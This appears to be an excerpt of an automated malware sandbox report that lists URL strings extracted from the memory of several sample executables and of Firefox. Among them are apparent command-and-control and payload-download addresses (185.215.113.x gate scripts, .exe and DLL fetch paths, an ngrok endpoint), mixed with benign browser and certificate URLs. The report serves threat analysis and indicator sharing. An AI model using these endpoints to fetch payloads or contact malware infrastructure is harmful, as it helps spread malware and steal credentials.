                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                      Source: firefox.exe, 0000002B.00000002.3200192387.0000023768585000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/%
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/W
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Y
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exet
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeo
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                      Source: 8eeb449c35.exe, 00000019.00000003.3141807375.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exew
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A64000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/5m
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllZ
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll3
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllA
                      Source: file.exe, 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/;m
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php7
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpCFBGDH.exeata;
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
                      Source: file.exe, 00000000.00000002.2589542776.0000000001868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
                      Source: 241fdb96f6.exe, 0000001A.00000002.2940433964.0000000001A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206ngineer
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                      Source: 8eeb449c35.exe, 00000019.00000003.3014142241.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microX
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: firefox.exe, 0000002B.00000002.3254494397.000002376C82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlbrowserDidUpgradeInsecureRequestsACTIVITY_SUBTYPE_REQU
                      Source: firefox.exe, 0000002B.00000002.3252774429.000002376C6D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                      Source: firefox.exe, 0000002B.00000002.3164927183.0000023763D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                      Source: firefox.exe, 0000002B.00000002.3164927183.0000023763D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                      Source: firefox.exe, 0000002B.00000002.3164927183.0000023763D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                      Source: firefox.exe, 0000002B.00000002.3164927183.0000023763D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressions
                      Source: firefox.exe, 0000002B.00000002.3164927183.0000023763D26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: 8eeb449c35.exe, 00000021.00000003.3277455938.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                      Source: firefox.exe, 0000002B.00000002.3167049287.0000023763EC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3194807647.0000023767148000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3087390284.000002376C7D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3227392661.0000023769A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3245686886.000002376C292000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3251616003.000002376C66E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3136873640.000002376B2D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3241589661.000002376BD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3252774429.000002376C6D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3266889270.0000023A0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3189037594.00000237661D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3035811213.00000237661E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3251616003.000002376C619000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3189037594.00000237661D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3248219964.000002376C4A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3037360194.0000023768BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3245686886.000002376C281000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3227392661.0000023769AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3233467913.000002376ACAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjshandlerSvc
                      Source: firefox.exe, 0000002B.00000002.3210555974.0000023768D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0W
                      Source: firefox.exe, 0000002B.00000002.3210555974.0000023768D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sCan
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%sresource://gre/modules/DeferredTask.sys.mjsScheme
                      Source: 8eeb449c35.exe, 00000021.00000003.3277455938.000000000117F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: file.exe, file.exe, 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-update
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_ACTIVE_NO_PROGRESS_TIMEOUT_SECS
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3182323592.0000023765B23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.0000023769235000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserSearchTeleme
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/RemoteWebNavigat
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620072000.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: 8eeb449c35.exe, 00000019.00000003.2910491584.0000000005332000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3119241468.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: firefox.exe, 0000002B.00000003.3012374390.0000023768732000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3012915910.0000023768753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/initializedAttributeInheritance
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.caINSTALL_REQUIREBUILTINCERTS40249-e88c401e1b1f2242d9e441c4
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C58C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
                      Source: firefox.exe, 0000002B.00000002.3245686886.000002376C292000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3136873640.000002376B2F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3120926026.000002376C8CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://baidu.com
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2912910905.000000000530D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924556550.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924865239.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                      Source: firefox.exe, 0000002B.00000002.3229545738.000002376A803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
